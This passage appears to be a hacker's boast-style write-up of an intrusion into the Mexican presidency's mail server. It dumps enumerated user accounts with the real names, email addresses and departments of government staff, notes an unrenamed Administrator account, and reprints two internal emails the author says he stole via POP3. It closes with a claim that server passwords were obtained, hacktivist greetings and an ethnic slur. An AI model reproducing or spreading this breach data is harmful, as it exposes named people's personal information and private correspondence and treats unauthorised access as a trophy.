The acast account is a normal USER, and the password was changed 0 days ago. This account has been used 4 times to logon. Comment User Comment Full name :Prospectiva y Proyectos Especiales : :Akram Daniel Castillo Cardenas

Account Name

:acontla@presidencia.gob.mx

The acontla account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment User Comment Full name Account Name :CAC - Coord. Admiva. : :Alejandro Contla Hosking :Administrator

The Administrator account is an ADMINISTRATOR, and the password was changed 0 days ago. This account has been used 847 times to logon. The default Administrator account has not been renamed. Consider renaming this account and removing most of its rights. Use a differnet account as the admin account. Comment User Comment Full name :Built-in account for administering the computer/domain : :

Account Name

:afernand@presidencia.gob.mx

The afernand account is a normal USER, and the password was changed 0 days ago. This account has been used 4 times to logon. Comment User Comment Full name :Politica : :Alejandra Fernandez Wong

Account Name

:afrias@presidencia.gob.mx

The afrias account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment User Comment Full name :DGCS - Publicaciones : :Alfonso Manuel Frias Badillo

Account Name

:agomez@presidencia.gob.mx

The agomez account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment User Comment Full name :Consejeria Juridica : :Alfredo Gomez Aguirre

Account Name

:agomezg@presidencia.gob.mx

The agomezg account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment User Comment Full name :DGCS - Analisis y Evaluacion : :Andres Gomez Glokner

Account Name

:agonzale@presidencia.gob.mx

The agonzale account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment User Comment Full name Account Name :CAC - DGPA : :Angel Gonzalez Amozorrutia :WWW$

The caltamir account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment User Comment Full name : : :

Un mail que por ah me he hurtado solo para saber cmo van las cosas :-) ************************************************************************* *** +OK Microsoft Exchange POP3 server version 5.5.2650.23 ready +OK +OK User successfully logged on Received: from presidencia.gob.mx (OCTAVIANO [200.23.123.37]) by mail.presidencia.gob.mx with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id VCFMTPYN; Tue, 17 Oct 2000 07:58:59 +0100 Message-ID: <39EC4D44.144F4269@presidencia.gob.mx> Date: Tue, 17 Oct 2000 07:59:48 -0500 From: Octaviano =?iso-8859-1?Q?Hern=E1ndez?= <ohernand@presidencia.gob.mx> X-Mailer: Mozilla 4.5 [es] (Win98; I) X-Accept-Language: es MIME-Version: 1.0 To: usuarios@presidencia.gob.mx Subject: Cambio de Servidor de Correo Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit

Debido a que fue necesario cambiar el servidor de correo por uno de ms capacidad, es posible que en este cambio se hayan perdido algunos correos, tanto al recibir como al enviar. Por lo cual le sugerimos reenviar o solicitar aquellos correos que Ud. considere importantes. As mismo se les informa que durante el da de hoy puede haber problemas en la recepcin de correos debido a que los cambios realizados tardan aproximadamente 24 horas en ser difundidos en internet. Por su comprensin gracias. . ************************************************************************* **** +OK Microsoft Exchange POP3 server version 5.5.2650.23 ready +OK +OK User successfully logged on Received: from presidencia.gob.mx (OCTAVIANO [200.23.123.37]) by mail.presidenci a.gob.mx with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21 ) id VYCDD7WK; Tue, 14 Nov 2000 22:33:04 -0000 Message-ID: <3A120416.D5350062@presidencia.gob.mx> Date: Tue, 14 Nov 2000 22:33:43 -0500 From: Octaviano =?iso-8859-1?Q?Hern=E1ndez?= <ohernand@presidencia.gob.mx> X-Mailer: Mozilla 4.5 [es] (Win98; I) X-Accept-Language: es MIME-Version: 1.0 To: usuarios@presidencia.gob.mx Subject: Nuevo Virus Content-Type: multipart/alternative; boundary="------------68EDA2B8A569812A6DD1AA9A" --------------68EDA2B8A569812A6DD1AA9A Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit ???? CUIDADO !!!! NO ABRAN EL MAIL CON EL ARCHIVO ADJUNTO "NAVIDAD.EXE ", NO IMPORTA SI SE LOS MANDA ALGUIEN CONOCIDO, ESTE VIRUS BLOQUEA LA COMPUTADORA Y SE AUTO MANDA A TODOS LOS DESTINATARIOS DE LA LIBRETA DE DIRECCIONES. . --------------68EDA2B8A569812A6DD1AA9A Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit <!doctype html public "-//w3c//dtd html 4.0 transitional//en"> <html>

<font color="#FF0000">???? CUIDADO !!!!</font> <p><font color="#CC0000">NO ABRAN EL MAIL</font> CON EL ARCHIVO ADJUNTO <font color="#FF0000">"NAVIDAD.EXE "</font>, <br>NO IMPORTA SI SE LOS MANDA ALGUIEN CONOCIDO, ESTE VIRUS BLOQUEA LA . COMPUTADORA Y SE AUTO MANDA A TODOS LOS DESTINATARIOS DE LA LIBRETA DE DIRECCIONES.</html> --------------68EDA2B8A569812A6DD1AA9A--

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-= NOTA: ESTE ARTICULO FUE ENVIADO A LA GENTE RESPONSABLE DE WWW.PRESIDENCIA.GOB.MX ANTES DE SER PUBLICADO, ESTO ES POR SI NO CONOCEN AUN TODAS LAS FALLAS, HE ENVIADO UN ESCRITO MUY BREVE Y PASSWORDS ENCONTRADOS EN SU SERVIDOR, ASI KE YO ESPERO KE CORRIJAN LA FALLAS AKI EXPUESTAS, AUN NO HE RECIBIDO RESPUESTA ASI KE ESTE TEXTO LO PUBLICARE JUNTO CON MAILS KE HE OBTENIDO, POR ULTIMO AGREGO ESTA LINEA... "FUCK ASSHOLE BRAZILIAN" ATTE: alt3kx! Greet to: dr_fdisk^ _0x90_ x-ploit Hacktivism! rUL3Z! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=